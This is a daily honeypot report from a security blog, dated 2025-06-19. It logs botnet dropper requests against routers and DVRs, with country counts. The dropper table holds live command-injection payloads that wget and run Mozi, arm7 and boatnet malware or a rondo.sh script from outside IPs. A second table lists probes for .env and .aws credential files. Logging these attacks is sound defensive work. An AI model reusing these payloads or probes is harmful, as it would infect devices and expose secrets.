Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-06-19

·456 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-19
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 7 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 30 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1079 requests were recorded during the day, originating from 7 different countries, with a peak of 278 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
42.226.68.212GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.226.68.212:40260/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
104.167.221.114POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F104.167.221.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbkdvr HTTP/1.1
141.98.11.83GET /shell?rm arm7;wget http://94.26.90.251/arm7;chmod 777 arm7;./arm7 arm7 HTTP/1.1
103.208.231.15327;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
144.172.100.214POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.30%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://45.125.66.79/x/tplink+-O-
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1052GET /.env-pipenv HTTP/1.1
1062GET /.env-poetry HTTP/1.1
1072GET /.env.custom HTTP/1.1
1092GET /.aws/sts.yml HTTP/1.1
1102GET /.aws/.secret HTTP/1.1
1112GET /.env-hidden HTTP/1.1
1122GET /.env-health HTTP/1.1
1132GET /.env-hashed HTTP/1.1
1142GET /.env-filter HTTP/1.1
1152GET /.env-tokens HTTP/1.1
1162GET /.env-prisma HTTP/1.1
1172GET /.env-export HTTP/1.1
1182GET /.env-secure HTTP/1.1
1192GET /.env-traces HTTP/1.1
1242GET /.env-db.env HTTP/1.1
1252GET /.env-params HTTP/1.1
1262GET /.env-vitest HTTP/1.1
1272GET /.env-pepper HTTP/1.1
1282GET /.env-django HTTP/1.1
1292GET /.env.dev.js HTTP/1.1
1322GET /.env.heroku HTTP/1.1
1332GET /.env-paypal HTTP/1.1
1342GET /.env-devops HTTP/1.1
1352GET /.env-escape HTTP/1.1
1632GET /.env.deploy HTTP/1.1
1642GET /.env-openid HTTP/1.1
2351GET /odinhttpcall1750324532 HTTP/1.1
2361GET /OdinHttpCall1750324532 HTTP/1.1
2371GET /Odin/http/call1750324532 HTTP/1.1
3681GET /3478047979 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0278US
1110GB
295DE
395SG
468JP
567NL
662CN
748BG
844SY
929CA
1021NG
1118LT
1216PL
1312IN
1412CH
1512PH
1611AU
178RU
187GH
197RO
207VN
216ZA
226UA
235KR
245HK
255BR
264IL
274BE
283KZ
293SC
302KW
312IE
321AM
331ES
341ID
351CZ
361MX
371IR
381AO

Related

Report: 2025-06-18
·2795 words
Repport Daily
Report: 2025-06-17
·435 words
Repport Daily
Report: 2025-06-16
·760 words
Repport Daily